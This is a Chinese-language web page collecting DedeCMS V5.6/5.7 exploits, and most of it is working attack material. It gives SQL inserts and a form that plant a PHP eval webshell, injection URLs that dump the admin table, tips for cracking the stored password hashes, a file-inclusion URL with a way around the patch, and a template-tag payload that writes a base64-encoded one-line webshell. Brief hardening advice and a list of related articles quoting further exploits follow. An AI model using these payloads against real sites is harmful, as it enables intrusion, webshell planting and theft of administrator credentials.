Dedecms V5.6/V5.7漏洞问题收集总结

DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)

前题条件,必须准备好自己的dede数据库,然后插入数据:

 以下是引用片段:

 代码如下 复制代码

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');
 

再用下面表单提交,shell 就在同目录下  1.php。原理自己研究。。。

 
以下是引用片段:

 代码如下 复制代码

 <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

此问题官方还没有解决办法,个人建义删除mytag_js.php文件,并把数据表中的XX_mytag表的中的text类开的字段修改,并且限制最多为1字节,如果你不使用这个功能。

DedeCms V5.6注入+本地包含0day

一、advancedsearch.php注入0day

 代码如下 复制代码
plus/advancedsearch.php

$sql 变量未初始化。导致鸡助注入。

原理不多说自已百度去,直接EXP:

 代码如下 复制代码
http://www.xxx.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

dede的密码破解方法是32位MD5减去头5位,减去尾七位,得到20MD5密码,方法是,前减3后减1,得到16位MD5。

 
二、carbuyaction.php本地包含鸡助0day

漏洞文件:plus/carbuyaction.php

还是原理不多说自已百度去,直接EXP:

 代码如下 复制代码
http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../

如果打了补丁在cookie中加上code=alipay继续使用。
再暴一个BUG,直接访问:

 代码如下 复制代码
http://www.dedecms.com/plus/carbuyaction.php?dopost=return&dsql=xx

暂时没什么利用价植,BUG一个。

DedeCms v5.6 恶意代码执行漏洞

影响版本:

DedeCms v5.6漏洞描述:
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用
测试方法:
注册会员,上传软件:本地地址中填入

 代码如下 复制代码
a{/dede:link}{dede:toby57 name="'']=0;phpinfo();//"}x{/dede:toby57},

发表后查看或修改即可执行

 代码如下 复制代码

a{/dede:link}{dede:toby57 name="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得SEBUG安全建议:
厂商补丁:
DEDECMS
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本

个人教训:我们可把upload,data目录设置不可执行和php文件,plus目录设置不要写任何文件,把不要的文件删除,模板目录最好也不可以上传和修改任何文件。

时间: 2024-09-22 09:19:02

Dedecms V5.6/V5.7漏洞问题收集总结的相关文章

DedeCMS通杀SQL注入漏洞利用代码及工具介绍

近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下: EXP: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'   or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select  CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,

dedecms v5.7/v5.6栏目增加缩略图功能教程

此功能添加涉及到以下文件: dede/catalog_add.php dede/catalog_edit.php dede/templets/catalog_add.htm dede/templets/catalog_edit.htm include/taglib/channel.lib.php 此升级修改方法,在V5.7,V5.7sp1 测试通过,其他版本未测试,原理基本相同,请大家自行测试是否可行. 首先给 栏目表(`#@__arctype`)增加一个字段typeimg  代码如下 复制代码

最新DedeCMS通杀SQL注入漏洞利用代码整理

      dedecms即织梦(PHP开源网站内容管理系统).织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:  代码如下 复制代码 /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`

dedecms防DDOS挂马漏洞的解决方法

我们可能中过phpddos的朋友对下面的代码不陌生吧 <?php header("charset='utf-8'"); error_reporting(0); set_time_limit(0); ignore_user_abort(TRUE); $ip = $_GET['ip']; $port = $_GET['port']; $exec_time =time()+$_GET['time']; $byte = 0; $true = 1; while($true) {  $byt

DEDECMS系统后台会员功能漏洞解决方案

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 大家好,今天来说下很多DEDE用户难以解决的问题.就是后台超多的垃圾企业会员问题.这个是很头疼的问题,因为DEDE删除会员没有全部删除活着选择多个删除功能.所以很多网站有成百上千个垃圾会员 而且每天都发一些垃圾文章.删除起来又很困难,大家一定很头疼,下面我来用通俗易懂的图文方法来教大家. 一:会员权限设置 登陆DED后台--选择系统栏目--然

DedeCMS曝SQL注入漏洞 360提醒站长速打补丁

中介交易 SEO诊断 淘宝客 云主机 技术大厅 近日,知名第三方漏洞报告平台乌云曝光建站工具DedeCMS系统反馈页面存在SQL注入高危漏洞(http://www.wooyun.org/bugs/wooyun-2012-014076 ),攻击者可以轻易获取网站管理员密码, 网站数据面临"拖库"威胁.经360网站安全检测(WebScan)对注册用户的分析研究发现,86%使用DedeCMS的网站存在该漏洞,危害范围十分广泛. 360网站安全检测服务网址:http://webscan.360

Dedecms织梦程序漏洞层出不穷 解决根本问题是关键

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 众所周之,织梦的开源程序在企业站或门户站中占有很大地位,其以自身强大功能及上手快,操作易的特点, 使得不少初学者纷纷选择此程序来搭建自己的网站站点.然而,正是因为如此多的的人使用此程序,也使得不少黑客利用其程序本身漏洞,入侵站长网站,挂黑链,发布病毒,种植木马,令广大织梦站长们苦不堪言,小编的垃圾车网站也曾经深受其害.那么,小编是怎样解决问题

dedecms安全漏洞之/include/common.inc.php漏洞解决办法

描述: 目标存在全局变量覆盖漏洞. 1.受影响版本DEDECMS 5.7.5.6.5.5. 2.漏洞文件/include/common.inc.php 3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量. 危害: 1.黑客可以通过此漏洞来重定义数据库连接. 2.通过此漏洞进行各种越权操作构造漏洞直接写入webshell后门. 临时解决方案: 在 /include/common.inc.php  中 找到注册变量的代码  代码如下 复制代码 foreach(Array('_GET

苹果悄悄补上了可被未授权收集传感器数据的iPhone漏洞

苹果悄悄补上了可被未授权收集传感器数据的iPhone漏洞 据英国纽卡斯尔大学研究人员本周披露,苹果曾于 2016 年修补了一个基于网站的 iOS 漏洞,别有用心的攻击者们可以未经授权地收集 iPhone 的传感器数据,获得目标设备上的许多机密信息,甚至包括用户的 passcode .其指出,Web 浏览器无需征求许可,即可接触多数传感器数据,而运动数据的特殊性让它很容易被拿来猜测用户的行为习惯.通过分析,其一次猜中 4 位数字 PIN 码的准确率竟然高达 70%,五次更可达到 100% . 恶意